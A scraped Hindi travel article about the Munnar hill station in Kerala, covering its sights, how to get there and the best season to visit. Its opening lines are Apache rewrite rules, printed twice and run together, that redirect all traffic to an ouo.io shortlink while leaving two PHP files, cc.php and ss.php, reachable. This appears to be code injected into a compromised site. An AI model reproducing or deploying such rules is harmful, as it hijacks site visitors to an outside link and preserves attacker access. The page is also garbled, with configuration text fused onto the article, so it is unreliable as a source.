
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 627
Previousमुन्नार टॉप हिल स्टेशन डेस्टिनेशन्स में से एक है। जो केरल के इडुक्कीम जिले में स्थित है। पहाड़ों के घुमावदार इलाकों से घिरा हुआ यह हिल स्टेशन पश्चिमी घाट पर स्थित सबसे खूबसूरत हिल स्टेशनों में से एक है।
मुन्नार एक मलयालम शब्द है जिसका अर्थ होता है तीन नदियों का संगम। यहां आपको तीन नदियां मधुरपुजहा, नल्लांथन्नीत और कुंडाली एक ही स्थान पर मिलती हुई दिखाई देंगी। दक्षिण भारत के एक अन्य लोकप्रिय राज्य तमिलनाडु के नजदीक होने के कारण यहां आने के बाद आप एक साथ दो राज्यों की मिली जुली संस्कृति का आनंद ले सकते हैं।
देवीकुलम: प्रकृति प्रेमियों के लिए यह एक पसंदीदा स्थल है क्योंकि वे यहां विभिन्न वनस्पतियों और जीव को देखने का लुत्फ उठाने के साथ-साथ उनका अध्ययन भी कर सकते हैं। देवीकुलम ट्रैकर्स के लिए भी पसंदीदा जगह है और बागानों तथा लाल गोंद के पेड़ों के बीच आपको बहुत मजा आएगा।
मट्टुपेट्टी: मट्टुपेट्टी मुन्नार से 13 किलोमीटर दूर सुर समुन्द्र तल से 1700 मीटर ऊपर मट्टुपेट्टी यहां स्थित एक और खूबसूरत स्थल है। आप यहां प्राकृतिक नजारों का आनंद ले सकते हैं।
इको पॉइंट: इको पॉइंट मुन्नार से 15 किलोमीटर की दूरी पार्ट स्थित है। यहां आप चिल्लाएंगे, तो आपको अपनी आवाज खुद को सुनाई देगी। ये जगह बेहद खूबसूरत है जो किसी का भी मन मोह सकती है।
एडवेंचर स्पोर्ट्स के लिए खास: आप चाहें तो यहां ट्रैकिंग का मजा ले सकते हैं। कई जगहों पर पैराग्लाइडिंग भी कर सकते हैं।
कैसे पहुंचे: मुन्नार पहुंचने के लिए आप हवाई मार्ग, रेल मार्ग या सड़क मार्ग तीनों का इस्तेमाल कर सकते हैं। कोच्चि अंतर्राष्ट्रीय हवाई अड्डा मुन्नार के लिए सबसे नजदीकी हवाई अड्डा है। नजदीकी रेलवे स्टेशन तमिलनाडु का थेनी है जो मुन्नार से 60 किलोमीटर की दूरी पर है।
कब जाएं: अक्टूबर से मई।